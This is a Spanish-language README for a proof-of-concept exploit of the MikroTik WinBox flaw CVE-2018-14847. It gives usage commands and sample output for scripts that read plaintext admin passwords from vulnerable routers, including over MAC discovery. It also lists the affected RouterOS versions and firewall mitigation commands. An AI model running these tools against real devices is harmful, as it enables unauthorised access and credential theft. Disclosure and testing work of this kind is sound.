
Prueba de concepto de la vulnerabilidad crítica de Winbox (CVE-2018-14847)
Esta es una prueba de concepto de la vulnerabilidad crítica de WinBox (CVE-2018-14847) que permite la lectura arbitraria de archivos con contraseñas en texto plano.
La vulnerabilidad ya fue corregida hace tiempo, por lo que este proyecto ha finalizado y no recibirá más soporte ni actualizaciones. Puedes clonarlo y actualizarlo por tu cuenta.
https://n0p.me/winbox-bug-dissection/
Este script NO funcionará con Python 2.x o versiones anteriores.
El script se usa de manera simple con argumentos simples en la línea de comandos.
Explota la vulnerabilidad y lee la contraseña.
python3 WinboxExploit.py <DIRECCIÓN-IP> [PUERTO]
Ejemplo:
$ python3 WinboxExploit.py 172.17.17.17
Conectado a 172.17.17.17:8291
Exploit exitoso
Usuario: admin
Contraseña: Th3P4ssWord
Puedes extraer archivos incluso si el dispositivo no tiene dirección IP.
Descubrimiento simple de dispositivos Mikrotik conectados localmente.
python3 MACServerDiscover.py
Ejemplo:
$ python3 MACServerDiscover.py
Buscando dispositivos Mikrotik (servidores MAC)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Explota la vulnerabilidad y lee la contraseña.
python3 MACServerExploit.py <DIRECCIÓN-MAC>
Ejemplo:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
Usuario: admin
Contraseña: Th3P4ssWord
Todas las versiones de RouterOS desde el 28-05-2015 hasta el 20-04-2018 son vulnerables a este exploit.
Dispositivos Mikrotik con versiones de RouterOS:
Para más información, visita: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox